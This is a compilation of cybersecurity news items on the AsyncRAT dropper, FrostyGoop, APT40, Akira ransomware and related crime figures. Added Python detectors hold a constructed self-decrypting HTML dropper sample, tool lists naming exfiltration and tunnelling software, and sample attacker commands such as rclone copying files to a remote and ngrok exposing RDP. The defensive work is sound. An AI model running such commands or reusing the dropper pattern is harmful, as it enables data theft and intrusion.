While investigating a malicious email, HP researchers discovered dropper scripts that were very likely written with the help of generative artificial intelligence (GenAI) services and used to deliver the AsyncRAT malware.
The campaign was discovered in June 2024. The phishing message used an invoice-themed lure and an encrypted HTML attachment, a technique used to evade detection at the email gateway. The encryption method stood out because the attacker embedded the AES decryption key in JavaScript inside the attachment itself, which is unusual: the malicious content is only reconstructed when the attachment is opened in a browser. Once decrypted, the attachment mimics a website but contains VBScript that acts as a dropper for the AsyncRAT remote access trojan. The VBScript modifies the Registry, drops a JavaScript file that is executed as a scheduled task, and creates a PowerShell script that launches the AsyncRAT payload.
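The HTML-attachment stage described above, an encrypted page that carries its own decryption key and writes a script to disk, can be triaged before it ever reaches a browser. The following is an added example (not HP's code) of a heuristic scanner for such attachments: it looks for a client-side AES decrypt call whose key is a string literal in the same file, a large base64-like blob, and a Blob/object-URL sink that forces the download of a script. The sample attachment, the CryptoJS call shape, the key and the variable names are constructed for illustration and are not taken from the real campaign.

```python
"""Heuristic triage of HTML attachments that decrypt themselves client-side.

Added example, not HP's code. The sample below is constructed: the real
attachment's structure, key and names are not known from the article.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: an "invoice" page that decrypts an embedded blob with
# a key stored right next to it, then forces a download of the result.
SAMPLE_HTML = """<html><body><h1>Invoice 2024-06</h1>
<script src="https://cdn.example.invalid/crypto-js.min.js"></script>
<script>
var payload = "U2FsdGVkX1+8fNm3fZ0mQ2k0R4Zz7J1xQ9G0Lq2uVbkYxP0aZ3cJ9d1Rk5P7xGSe1hJ9m2Q0lZ9Vq3";
var key = "s3cr3t-dr0pp3r-k3y";
var plain = CryptoJS.AES.decrypt(payload, key).toString(CryptoJS.enc.Utf8);
var blob = new Blob([plain], {type: "application/octet-stream"});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.vbs";
a.click();
</script></body></html>"""

BENIGN_HTML = """<html><body><h1>Invoice 2024-06</h1>
<p>Your invoice is attached as a PDF.</p></body></html>"""


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


# Heuristic patterns; they assume a CryptoJS-style decrypt stub (an assumption).
STRING_ASSIGN = re.compile(r"\b(?:var|let|const)\s+(\w+)\s*=\s*[\"']([^\"']+)[\"']")
AES_DECRYPT = re.compile(r"CryptoJS\.AES\.decrypt\s*\(\s*(\w+)\s*,\s*(\w+)\s*\)")
ENCODED_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
DOWNLOAD_NAME = re.compile(r"\.download\s*=\s*[\"']([^\"']+)[\"']")
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta|lnk|iso|exe)$", re.IGNORECASE)
BLOB_SINK = re.compile(r"new\s+Blob\s*\(|URL\.createObjectURL\s*\(")


def scan_html(html: str) -> list[Finding]:
    """Return the heuristic findings for one HTML attachment."""
    findings: list[Finding] = []
    literals = dict(STRING_ASSIGN.findall(html))  # variable name -> string literal

    for match in AES_DECRYPT.finditer(html):
        data_var, key_var = match.groups()
        if key_var in literals:
            # The decryption key travels inside the attachment itself.
            findings.append(Finding("embedded_key",
                f"AES key for '{data_var}' is the literal in '{key_var}' ({len(literals[key_var])} chars)"))
        else:
            findings.append(Finding("client_side_decrypt",
                f"AES decrypt of '{data_var}' with key '{key_var}' not found as a literal"))

    for name, value in literals.items():
        if ENCODED_BLOB.fullmatch(value):
            findings.append(Finding("encoded_blob", f"'{name}' holds a {len(value)}-char base64-like blob"))

    if BLOB_SINK.search(html):
        findings.append(Finding("blob_sink", "decrypted bytes are wrapped in a Blob / object URL"))

    for match in DOWNLOAD_NAME.finditer(html):
        if SCRIPT_EXT.search(match.group(1)):
            findings.append(Finding("script_download", f"forced download of '{match.group(1)}'"))

    return findings


def is_self_decrypting_dropper(findings: list[Finding]) -> bool:
    """Verdict: the key ships with the ciphertext AND there is a sink that writes a file."""
    rules = {f.rule for f in findings}
    return "embedded_key" in rules and bool(rules & {"blob_sink", "script_download"})


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(f"[{finding.rule}] {finding.detail}")
    print("verdict:", is_self_decrypting_dropper(scan_html(SAMPLE_HTML)))
```

A page that asks the user for a password before decrypting produces only a `client_side_decrypt` finding and no verdict, which is the intended separation: the signal is not "AES in JavaScript" but "the key is shipped next to the ciphertext and the result is written to disk".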
Analysis of the code revealed that the threat actors behind the campaign had commented almost the entire codebase. This is unusual among malware authors, who typically try to make analysis of their malicious code harder, not easier.
“Interestingly, when we analyzed the VBScript and the JavaScript, we were surprised to find that the code was not obfuscated. In fact, the attacker had left comments throughout the code, describing what each line does even for simple functions. Genuine code comments in malware are rare because attackers want to make their malware as difficult to understand as possible.” reads HP’s Threat Insights Report for Q2 2024. “Based on the scripts’ structure, consistent comments for each function and the choice of function names and variables, we think it’s highly likely that the attacker used GenAI to develop these scripts (T1588.007). The activity shows how GenAI is accelerating attacks and lowering the bar for cybercriminals to infect endpoints.”
Threat actors have been using generative AI to craft phishing lures for some time, but its use to write malicious code has so far been rarely documented. The case described by HP shows how generative AI is accelerating cyberattacks and lowering the skill needed to develop malware.
“The scripts’ structure, comments and choice of function names and variables were strong clues that the threat actor used GenAI to create the malware.” concludes the report.
Follow me on Twitter: and and Mastodon
(SecurityAffairs – hacking, generative artificial intelligence malware)
Blockchain analysis firm Chainalysis revealed that while overall on-chain illicit activity has decreased by nearly 20% year-to-date, stolen funds and ransomware inflows have increased significantly. Stolen-funds inflows almost doubled, rising from $857 million to $1.58 billion, and ransomware inflows grew by about 2%, from $449.1 million to $459.8 million.
In 2024, ransomware payments are on track to reach record highs, driven by “big game hunting”: the experts believe that fewer but higher-profile attacks are yielding larger ransoms. The largest ransom payment recorded this year was to the .
The experts pointed out that the trend of rising ransomware payments is particularly alarming, with both maximum and median payment amounts increasing sharply, especially for the most severe ransomware strains. These strains, classified according to their on-chain activity, show a significant increase in median payments, particularly for “very high severity” strains: the median payment for these strains skyrocketed from $198,939 in early 2023 to $1.5 million by mid-2024, a nearly 8-fold increase in just 18 months and a 1200-fold rise since early 2021.
These figures suggest that ransomware gangs are focusing on larger businesses and critical infrastructure, where bigger ransoms can be extracted.
Law enforcement disruptions have fragmented the ransomware ecosystem. Meanwhile, legitimate crypto adoption has grown, helped by developments such as ETF approvals.
Disruptions of the largest ransomware operations led affiliates to migrate to less effective strains, and some operations to rebrand.
“Whether it be former affiliates of these well-known threat actor operations, or new upstarts, a large number of new ransomware groups have joined the fray, displaying new methods and techniques to carry out their attacks such as expansion in their means for initial access and lateral movement approaches.” said Andrew Davis, general counsel at Kiva Consulting.
“This encouraging sign points to the continued adoption of crypto. Inflows to risky services (made up primarily of mixers and exchanges that do not collect KYC information) are trending higher than they were at this point last year. Meanwhile, aggregate illicit activity fell YTD by 19.6%, dropping from $20.9B to $16.7B, demonstrating that legitimate activity is growing faster than illicit activity on-chain.” reads the report.
Ransomware attacks have increased by at least 10% this year, according to data from eCrime.ch. Despite this surge, and record highs in total ransom volume and maximum payment size, the good news is that victims are paying less often: while ransomware incidents posted on leak sites have risen by 10% year-over-year, on-chain data shows a 27.29% decline in actual ransom payments. In short, more victims are being targeted, but fewer are paying.
“The key to disrupting cybercrime is disrupting its supply chains, including attackers, affiliates, partners, infrastructure services providers, launderers, and cashout points.” concludes the report. “Because the operations for crypto heists and ransomware operate almost entirely on the blockchain, law enforcement armed with the right solutions can follow the money to better understand and disrupt these actors’ operations.”
(SecurityAffairs – hacking, malware)
In April 2024, Dragos researchers discovered a new ICS malware named FrostyGoop that interacts with Industrial Control Systems using the Modbus protocol. FrostyGoop is the ninth ICS-specific malware discovered, and one that a nation-state actor employed in attacks in the wild.
The experts reported that FrostyGoop was used in a January 2024 attack on a heating company in Lviv, Ukraine. The threat actors, linked to Russia, exploited a vulnerability in a MikroTik router and left 600 buildings without heat for nearly two days. Dragos started analyzing the FrostyGoop malware in April 2024 and initially thought it was a testing tool, but later confirmed it had been used for disruptive purposes. The lack of network segmentation facilitated the attacker’s access to other systems.
The Cyber Security Situation Center linked FrostyGoop to the attack on a Lviv energy company.
“The Cyber Security Situation Center (CSSC), a part of the Security Service of Ukraine (Служба безпеки України), shared details with Dragos of a cyber attack that took place in January 2024. During the late evening on 22 January 2024, through 23 January, adversaries conducted a disruption attack against a municipal district energy company in Lviv, Ukraine.” reads the report published by Dragos. “At the time of the attack, this facility fed over 600 apartment buildings in the Lviv metropolitan area, supplying customers with central heating.”
According to the CSSC, the attackers initially gained access in April 2023 via a MikroTik router vulnerability and, in January 2024, disrupted heating for 600 buildings for nearly two days.
The researchers reported that the attackers gained access to the district energy company’s network assets using L2TP (Layer Two Tunnelling Protocol) connections from Moscow-based IP addresses.
The threat actors downgraded the firmware on ENCO controllers, causing inaccurate readings and loss of heating. The attackers sent Modbus commands to the controllers, an action made possible by poor network segmentation and previously stolen credentials, and accessed the system primarily from Tor IP addresses. They did not attempt to destroy the controllers; they only acted to disrupt their operation.
“The victim network assets, which consisted of a Mikrotik router, four management servers, and the district heating system controllers, were not adequately segmented within the network. A forensic examination during the investigation showed that the adversaries sent Modbus commands directly to the district heating system controllers from adversary hosts, facilitated by hardcoded network routes.” continues the report. “The affected heating system controllers were ENCO Controllers. The adversaries downgraded the firmware on the controllers from versions 51 and 52 to 50, which is a version that lacks monitoring capabilities employed at the victim facility, resulting in the Loss of View.”
“FrostyGoop’s ability to communicate with ICS devices via Modbus TCP threatens critical infrastructure across multiple sectors. Given the ubiquity of the Modbus protocol in industrial environments, this malware can potentially cause disruptions across all industrial sectors by interacting with legacy and modern systems.” concludes the report. “The Lviv, Ukraine, incident highlights the need for adequate security controls, including OT-native monitoring. Antivirus vendors’ lack of detection underscores the urgency of implementing continuous OT network security monitoring with ICS protocol-aware analytics to inform operations of potential risks.”
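Dragos’s conclusion above calls for OT-native, ICS-protocol-aware monitoring, because the Modbus writes that changed the controllers’ state look like ordinary TCP traffic to an antivirus or a generic firewall. The following is an added example (not Dragos’s code and not FrostyGoop) of what such analytics do at their simplest: parse the Modbus/TCP MBAP header and PDU, recover the function code, address and written values, and alert when a write comes from a host that is not the allowlisted engineering workstation or from outside the OT subnet. The frames, IP addresses, OT subnet and allowlist are constructed for this example; the ENCO controllers’ register map is not known from the article, so the policy is host-based rather than register-based.

```python
"""Protocol-aware monitoring of Modbus/TCP requests.

Added example, not Dragos's code and not FrostyGoop. It parses the MBAP
header and the common read/write PDUs, then applies a write-source policy.
The frames, hosts, OT subnet and allowlisted workstation are constructed.
"""
from __future__ import annotations

import ipaddress
import struct
from dataclasses import dataclass

READ_FUNCTIONS = {1: "Read Coils", 2: "Read Discrete Inputs",
                  3: "Read Holding Registers", 4: "Read Input Registers"}
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers"}

# Policy (assumptions for the example): only the engineering workstation may
# write, and all Modbus traffic must originate inside the OT subnet.
OT_NETWORK = ipaddress.ip_network("10.10.0.0/16")
ALLOWED_WRITERS = {"10.10.1.5"}


@dataclass(frozen=True)
class ModbusRequest:
    transaction_id: int
    unit_id: int
    function_code: int
    address: int
    quantity: int | None        # None for single-item writes and unknown codes
    values: tuple[int, ...]     # written values (empty for reads)


def parse_request(frame: bytes) -> ModbusRequest:
    """Parse MBAP header + PDU of a Modbus/TCP request (all fields big-endian)."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    txid, proto, length, unit, fc = struct.unpack(">HHHBB", frame[:8])
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus")
    if length != len(frame) - 6:                      # length covers unit id + PDU
        raise ValueError("MBAP length disagrees with frame size")
    data = frame[8:]
    if fc in (1, 2, 3, 4):                            # start address, quantity
        address, quantity = struct.unpack(">HH", data[:4])
        return ModbusRequest(txid, unit, fc, address, quantity, ())
    if fc in (5, 6):                                  # address, value
        address, value = struct.unpack(">HH", data[:4])
        return ModbusRequest(txid, unit, fc, address, None, (value,))
    if fc in (15, 16):                                # address, quantity, byte count, payload
        address, quantity, nbytes = struct.unpack(">HHB", data[:5])
        payload = data[5:5 + nbytes]
        if len(payload) != nbytes:
            raise ValueError("truncated write payload")
        if fc == 16 and nbytes != 2 * quantity:
            raise ValueError("byte count does not match register quantity")
        values = struct.unpack(f">{quantity}H", payload) if fc == 16 else tuple(payload)
        return ModbusRequest(txid, unit, fc, address, quantity, tuple(values))
    return ModbusRequest(txid, unit, fc, 0, None, ())   # unknown / vendor-specific code


def inspect(src_ip: str, dst_ip: str, frame: bytes) -> list[tuple[str, str]]:
    """Return (severity, message) alerts raised by one request."""
    req = parse_request(frame)
    fc = req.function_code
    alerts: list[tuple[str, str]] = []
    if ipaddress.ip_address(src_ip) not in OT_NETWORK:
        alerts.append(("HIGH", f"{src_ip} -> {dst_ip}: Modbus request from outside the OT subnet"))
    if fc in WRITE_FUNCTIONS and src_ip not in ALLOWED_WRITERS:
        alerts.append(("HIGH", f"{src_ip} -> {dst_ip} unit {req.unit_id}: {WRITE_FUNCTIONS[fc]} "
                               f"at address {req.address} values {req.values} from non-allowlisted host"))
    if fc not in WRITE_FUNCTIONS and fc not in READ_FUNCTIONS:
        alerts.append(("MEDIUM", f"{src_ip} -> {dst_ip}: unusual function code {fc}"))
    return alerts


# Constructed frames: txid | proto 0 | length | unit | FC | PDU data.
READ_HOLDING = bytes.fromhex("00010000000601030000000a")            # FC 3: addr 0, 10 registers
WRITE_SINGLE = bytes.fromhex("000200000006010600100032")            # FC 6: addr 0x10 <- 0x32
WRITE_MULTI = bytes.fromhex("00030000000b0110001000020400010002")   # FC 16: addr 0x10 <- 1, 2
SAMPLE_TRAFFIC = [
    ("10.10.1.5", "10.10.2.20", READ_HOLDING),     # workstation polling: fine
    ("10.10.1.5", "10.10.2.20", WRITE_SINGLE),     # allowlisted writer: fine
    ("10.10.3.77", "10.10.2.20", WRITE_MULTI),     # write from an unexpected internal host
    ("203.0.113.7", "10.10.2.20", WRITE_MULTI),    # write from outside the OT subnet
]


def run_monitor(traffic) -> list[tuple[str, str]]:
    alerts: list[tuple[str, str]] = []
    for src, dst, frame in traffic:
        alerts.extend(inspect(src, dst, frame))
    return alerts


if __name__ == "__main__":
    for severity, message in run_monitor(SAMPLE_TRAFFIC):
        print(severity, message)
```

The two flagged frames are byte-for-byte identical legitimate Modbus; only the source host makes them an incident, which is why a monitor must keep an asset inventory (who may write to which unit) rather than look for "malicious" packets.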
(SecurityAffairs – hacking, ICS malware)
Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. released a joint advisory warning about the China-linked APT40 group (aka TEMP.Periscope, TEMP.Jumper, Bronze Mohawk, Gingham Typhoon, ISLANDDREAMS, Kryptonite Panda, Red Ladon, and Leviathan) and its capability to rapidly exploit newly disclosed flaws.
The China-linked group has been able to exploit vulnerabilities within hours or days of their public disclosure.
APT40 has previously targeted organizations in countries including Australia and the United States. The group rapidly adapts public vulnerability proofs of concept (POCs) for its own operations, and weaponizes new exploits for widely used software such as Log4j, Atlassian Confluence, and Microsoft Exchange to target the associated infrastructure.
“APT 40 has previously targeted organizations in various countries, including Australia and the United States. Notably, APT 40 possesses the ability to quickly transform and adapt vulnerability proofs of concept (POCs) for targeting, reconnaissance, and exploitation operations.” reads the advisory. “APT 40 identifies new exploits within widely used public software such as Log4J, Atlassian Confluence and Microsoft Exchange to target the infrastructure of the associated vulnerability.”
In July 2021, the U.S. Justice Department (DoJ) indicted four members of the cyber espionage group APT40 (aka TEMP.Periscope, TEMP.Jumper, and Leviathan) for hacking tens of government organizations, private businesses and universities around the world between 2011 and 2018.
The APT40 group has been active since at least 2013 and focuses on countries that are important to China’s Belt and Road Initiative (i.e. Cambodia, Belgium, Germany, Hong Kong, the Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom).
The group appears to be focused on supporting the naval modernization efforts of the Chinese government. The threat actors target the engineering, transportation, and defense sectors, and experts have observed a specific interest in maritime technologies.
The cyberspies also targeted research centres and universities involved in naval research with the intent to access advanced technology to push the growth of the Chinese naval industry. The list of victims of the APT40 group also includes organizations with operations in Southeast Asia or involved in South China Sea disputes.
Three of the defendants are said to be officers in a provincial arm of the Ministry of State Security (MSS), and one was an employee of a front company used to obscure the government’s role in the hacking campaigns.
“APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies’ countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of-life or no longer maintained devices on networks of interest, and to rapidly deploy exploits. APT40 continues to find success exploiting vulnerabilities from as early as 2017.” continues the advisory. “APT40 rapidly exploits newly public vulnerabilities in widely used software such as Log4J, Atlassian Confluence and Microsoft Exchange. ASD’s ACSC and the authoring agencies expect the group to continue using POCs for new high-profile vulnerabilities within hours or days of public release.”
APT40 prefers exploiting vulnerable public-facing infrastructure over other techniques such as phishing, and it prioritizes obtaining valid credentials for subsequent activities. The group often relies on web shells to maintain persistence early in an intrusion; because persistence is established so early, it is likely to be observed in every case, regardless of how far the compromise progressed.
In the past, APT40 was observed using compromised Australian websites as C2 servers, but it has recently evolved this technique.
“APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors for its operations in Australia. This has enabled the authoring agencies to better characterize and track this group’s movements.” continues the report.
Many of the compromised SOHO devices are end-of-life or unpatched and can be easily compromised with N-day exploits. Compromised SOHO devices give attackers a platform from which to launch attacks that blend in with legitimate traffic.
The report provides details about the Tactics, Techniques, and Procedures (TTPs) associated with the group, along with detection and mitigation recommendations.
(SecurityAffairs – hacking, China)
A joint advisory published by CISA, the FBI, Europol, and the Netherlands’ National Cyber Security Centre (NCSC-NL) revealed that since early 2023, Akira ransomware operators have received $42 million in ransom payments from more than 250 victims worldwide.
The Akira ransomware has been active since March 2023; the threat actors behind it claim to have already hacked multiple organizations across industries including education, finance, and real estate. Like other ransomware gangs, the group has developed a Linux encryptor to target VMware ESXi servers.
The Akira ransomware operators implement a double extortion model by exfiltrating victims’ data before encrypting it.
Earlier versions of the ransomware were written in C++ and appended the .akira extension to encrypted files. From August 2023 onwards, however, certain Akira attacks began using Megazord, a Rust-based variant that encrypts files with a .powerranges extension. Akira threat actors have continued to use both Megazord and Akira (including Akira_v2, identified by independent investigations) interchangeably.
The researchers observed threat actors obtaining initial access through virtual private network (VPN) services that had no multifactor authentication (MFA) configured, mostly by exploiting known Cisco vulnerabilities.
Akira operators were also observed using external-facing services such as Remote Desktop Protocol (RDP), spear phishing, and the abuse of valid credentials.
Following initial access, threat actors were observed abusing domain controller functions to create new domain accounts for persistence. In some attacks, the threat actors created an administrative account named itadm.
“According to FBI and open source reporting, Akira threat actors leverage post-exploitation attack techniques, such as Kerberoasting, to extract credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS). Akira threat actors also use credential scraping tools like Mimikatz and LaZagne to aid in privilege escalation.” reads the advisory. “Tools like SoftPerfect and Advanced IP Scanner are often used for network device discovery (reconnaissance) purposes and net Windows commands are used to identify domain controllers and gather information on domain trust relationships.”
Akira operators have been observed deploying two distinct ransomware variants against different system architectures within the same attack. This was the first time the operators were observed using this tactic.
The operators frequently disable security software to evade detection and to move laterally. The government experts observed Akira threat actors using PowerTool to exploit the Zemana AntiMalware driver and terminate antivirus-related processes, a bring-your-own-vulnerable-driver (BYOVD) technique.
Threat actors use FileZilla, WinRAR, WinSCP, and RClone for data exfiltration, and AnyDesk, Cloudflare Tunnel, RustDesk, and Ngrok to communicate with the command-and-control (C&C) infrastructure.
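The account creation, Kerberoasting, driver abuse, exfiltration and tunnelling steps described above each leave a distinct trace in Windows Security and Sysmon telemetry. The following is an added example (not the advisory’s code or any vendor’s) of detection logic for those traces, run over a set of constructed sample events: a 4720 event creating the itadm account named in the advisory, a burst of 4769 service-ticket requests with RC4 (0x17) encryption from one client, which is how Kerberoasting typically shows up on a domain controller, a Sysmon driver-load for a Zemana-signed driver, and process creations for PowerTool, rclone and ngrok. Field names, hostnames, users, paths and the driver file name are assumptions; the Kerberoasting threshold of three distinct SPNs is a starting point to tune, not a published figure.

```python
"""Detection logic for the Akira post-exploitation TTPs, run over constructed
sample events. Added example, not the advisory's or any vendor's code.
Event shape mirrors SIEM-normalized Windows Security / Sysmon records
(field names are assumptions); hostnames, users, paths and the driver file
name are invented for the example.
"""
from __future__ import annotations

from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample events (4720 = account created, 4769 = TGS request,
# Sysmon 1 = process create, Sysmon 6 = driver load).
SAMPLE_EVENTS = [
    {"event_id": 4720, "host": "DC01", "subject_user": "jdoe", "target_user": "itadm"},
    {"event_id": 4769, "host": "DC01", "client_ip": "10.0.5.21",
     "service_name": "MSSQLSvc/sql01.corp.example", "ticket_encryption": "0x17"},
    {"event_id": 4769, "host": "DC01", "client_ip": "10.0.5.21",
     "service_name": "HTTP/web01.corp.example", "ticket_encryption": "0x17"},
    {"event_id": 4769, "host": "DC01", "client_ip": "10.0.5.21",
     "service_name": "CIFS/fs01.corp.example", "ticket_encryption": "0x17"},
    {"event_id": 4769, "host": "DC01", "client_ip": "10.0.5.40",
     "service_name": "CIFS/fs01.corp.example", "ticket_encryption": "0x12"},   # AES: normal
    {"event_id": 1, "host": "WS-21", "user": "CORP\\itadm",
     "image": "C:\\Temp\\PowerTool.exe", "command_line": "PowerTool.exe"},
    {"event_id": 6, "host": "WS-21", "image_loaded": "C:\\Windows\\Temp\\zam64.sys",
     "signature": "Zemana Ltd."},
    {"event_id": 1, "host": "FS01", "user": "CORP\\itadm",
     "image": "C:\\Users\\itadm\\rclone.exe",
     "command_line": "rclone copy D:\\Finance remote:bucket --transfers 32"},
    {"event_id": 1, "host": "WS-21", "user": "CORP\\itadm",
     "image": "C:\\ProgramData\\ngrok.exe", "command_line": "ngrok tcp 3389"},
    {"event_id": 1, "host": "WS-07", "user": "CORP\\jdoe",
     "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "command_line": "EXCEL.EXE"},                                             # benign noise
]

SUSPICIOUS_NEW_ACCOUNTS = {"itadm"}            # account name cited in the advisory
AV_KILL_TOOLS = {"powertool.exe"}
ABUSED_DRIVER_SIGNERS = {"zemana"}              # Zemana AntiMalware driver abused via PowerTool
EXFIL_TOOLS = {"rclone.exe", "winscp.exe", "filezilla.exe", "winrar.exe"}
TUNNEL_TOOLS = {"anydesk.exe", "rustdesk.exe", "ngrok.exe", "cloudflared.exe"}
RC4_HMAC = "0x17"                               # encryption type Kerberoasting tools request
KERBEROAST_SPN_THRESHOLD = 3                    # distinct SPNs with RC4 from one client (tune)


def detect(events: list[dict]) -> list[tuple[str, str, str]]:
    """Return (tactic, where, detail) alerts for the given events."""
    alerts: list[tuple[str, str, str]] = []
    rc4_spns: dict[str, set[str]] = defaultdict(set)

    for e in events:
        eid = e.get("event_id")
        if eid == 4720 and e.get("target_user", "").lower() in SUSPICIOUS_NEW_ACCOUNTS:
            alerts.append(("persistence", e["host"],
                           f"domain account '{e['target_user']}' created by {e.get('subject_user')}"))
        elif eid == 4769 and e.get("ticket_encryption") == RC4_HMAC:
            rc4_spns[e["client_ip"]].add(e["service_name"])   # aggregate, decide after the loop
        elif eid == 6 and any(s in e.get("signature", "").lower() for s in ABUSED_DRIVER_SIGNERS):
            alerts.append(("defense_evasion", e["host"], f"known-abused driver loaded: {e['image_loaded']}"))
        elif eid == 1:
            exe = PureWindowsPath(e.get("image", "")).name.lower()
            detail = f"{exe} run by {e.get('user')}: {e.get('command_line')}"
            if exe in AV_KILL_TOOLS:
                alerts.append(("defense_evasion", e["host"], detail))
            elif exe in EXFIL_TOOLS:
                alerts.append(("exfiltration", e["host"], detail))
            elif exe in TUNNEL_TOOLS:
                alerts.append(("command_and_control", e["host"], detail))

    for client, spns in rc4_spns.items():
        if len(spns) >= KERBEROAST_SPN_THRESHOLD:
            alerts.append(("credential_access", client,
                           f"{len(spns)} RC4 service tickets requested (Kerberoasting): {sorted(spns)}"))
    return alerts


if __name__ == "__main__":
    for tactic, where, detail in detect(SAMPLE_EVENTS):
        print(f"{tactic:20} {where:12} {detail}")
```

The Kerberoasting rule is the only one that needs state across events: a single RC4 ticket request is common from legacy clients, so it aggregates per requesting host and fires only when one host asks for tickets to several different services, which legitimate clients rarely do in one burst.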
“Akira threat actors utilize a sophisticated hybrid encryption scheme to lock data. This involves combining a ChaCha20 stream cipher with an RSA public-key cryptosystem for speed and secure key exchange. This multilayered approach tailors encryption methods based on file type and size and is capable of full or partial encryption.” concludes the advisory, which also includes indicators of compromise (IoCs).
(SecurityAffairs – hacking, Akira ransomware)
The U.S. Department of Health and Human Services (HHS) reported that threat actors are carrying out attacks against IT help desks across the Healthcare and Public Health (HPH) sector.
The Health Sector Cybersecurity Coordination Center (HC3) recently observed threat actors using sophisticated social engineering tactics against IT help desks in the health sector, with the aim of gaining initial access to the target organizations.
The attacker calls the target organization’s IT help desk from a local area code and claims to be an employee in a financial role. To pass identity verification, the threat actor supplies the sensitive details the help desk asks for, including the last four digits of the impersonated employee’s Social Security number (SSN) and corporate ID number, along with other demographic details, likely gathered from professional networking sites and other OSINT sources. The threat actor then claims that they cannot log in or receive MFA tokens because their phone is broken, and tricks the help desk into enrolling a new, attacker-controlled device in multi-factor authentication (MFA) to gain access to corporate resources.
Upon gaining initial access to the target organization, the threat actor focuses on obtaining login credentials for payer websites, allowing them to alter ACH details for paying accounts. Then they used compromised employee email accounts to hijack payments.
“After gaining access, the threat actor specifically targeted login information related to payer websites, where they then submitted a form to make ACH changes for payer accounts. Once access has been gained to employee email accounts, they sent instructions to payment processors to divert legitimate payments to attacker-controlled U.S. bank accounts.” reads the alert. “The funds were then transferred to overseas accounts. During the malicious campaign, the threat actor also registered a domain with a single letter variation of the target organization and created an account impersonating the target organization’s Chief Financial Officer (CFO).”
According to the alert, in some cases, threat actors attempted to leverage AI voice impersonation techniques as part of their social engineering tactics.
A global study cited in the alert found that 25% of individuals surveyed reported experiencing, or knowing someone who fell victim to, an AI voice cloning scam.
The alert states that the social engineering techniques described in the report are similar to those used in attacks against an organization in the hospitality and entertainment industry in September 2023, which were attributed to the threat actor tracked as UNC3944.
That attack aimed to infect the target infrastructure with the . However, UNC3944 has yet to claim attacks against the health sector.
The alert includes mitigations that healthcare organizations can implement to block attacks against IT help desks.
(SecurityAffairs – hacking, IT help desks)
Google’s Threat Analysis Group (TAG) and its subsidiary Mandiant reported that 97 zero-day vulnerabilities were exploited in attacks in 2023, up from 62 actively exploited zero-day flaws in 2022.
In 2023, Google (TAG) and Mandiant discovered 29 out of 97 vulnerabilities exploited in the wild.
In 2023, the researchers observed 36 zero-day vulnerabilities exploited in the wild targeting enterprise-specific technologies, while 61 vulnerabilities affected end-user platforms and products such as mobile devices, operating systems, browsers, and other applications.
The researchers reported that investments in exploit mitigations across browsers and operating systems are affecting the offensive capabilities of threat actors.
Of the eight in-the-wild zero-days targeting Chrome in 2023, none affected the Document Object Model (DOM) and none were use-after-free bugs.
“In 2023 there were no use-after-free vulnerabilities exploited in Chrome for the first time since we began seeing Chrome zero days in-the-wild. Both Chrome and Safari have made exploiting JavaScript Engine vulnerabilities more complex through their V8 heap sandbox and JITCage respectively. Exploits must now include bypasses for these mitigations instead of just exploiting the bug directly.” reads the report published by Google TAG.
The researchers also reported that Lockdown Mode on iOS makes it harder for attackers to exploit zero-day flaws.
In 2023, the researchers observed a surge in zero-day vulnerabilities in third-party components and libraries that can impact all products that use them.
In 2023, the researchers attributed 48 of the 58 attributable zero-day vulnerabilities to commercial surveillance vendors (CSVs) and government espionage actors, while 10 were attributed to financially motivated actors.
Financially motivated threat actors exploited a total of ten zero-day vulnerabilities; the FIN11 cybercrime group was among the most active, exploiting three separate zero-day flaws. The researchers also tracked at least four ransomware groups exploiting four zero-day vulnerabilities.
“FIN11 appears to have invested heavily in zero-day exploitation in the last several years. From late 2020 to early 2021, the group also exploited multiple zero-day vulnerabilities in Accellion’s legacy File Transfer Appliance (FTA), demonstrating a years-long focus by these actors on identifying and exploiting zero-days. Additionally, we tracked the exploitation of four additional zero-day vulnerabilities by four ransomware families in 2023.” continues the report.
China made the headlines because government-linked APT groups exploited 12 zero-day vulnerabilities in 2023, a notable increase from seven in 2022.
“While it is near impossible to predict the number of zero-days for 2024, it remains clear that the pace of zero-day discovery and exploitation will likely remain elevated when compared to pre-2021 numbers. Regardless of the number, it is clear that the steps we as security researchers and product vendors are taking are having an impact on attackers. However, we must recognize that our successes will likely manifest as actors increasingly targeting wider and more varied products, as the tried and true methods increasingly become less viable.” concludes the report. “Zero-day exploitation is no longer just a niche capability accessible to only a handful of actors, and we anticipate that the growth we have seen across the last few years will likely continue, as vendors continue to make other avenues of compromise less accessible and as threat actors focus increasing resources on zero-day exploitation.”
(SecurityAffairs – Hacking, zero-day vulnerabilities)
The 2023 Internet Crime Report published by the FBI’s Internet Crime Complaint Center (IC3) reveals that reported cybercrime losses reached $12.5 billion in 2023.
The figure marks a 22% surge in reported losses compared to 2022.
In 2023, the FBI IC3 received a record number of complaints, totaling 880,418, which represents a nearly 10% increase in complaints received compared to 2022.
The report notes that the above figures are conservative concerning cybercrime in 2023, as only a small percentage of victims reported incidents to law enforcement.
According to the report, in 2023 tech support scams and extortion crimes increased, while phishing, non-payment/non-delivery scams, and personal data breach slightly decreased.
The most expensive type of crime monitored by IC3 in 2023 was “investment scams,” whose losses increased from $3.31 billion in 2022 to $4.57 billion in 2023 (+38%). The second most costly crime was business email compromise (BEC), which caused $2.9 billion in losses. The FBI reports that victims aged 30 to 49 were predominantly affected by investment fraud, whereas elderly victims accounted for well over half of the losses attributed to tech support scams.
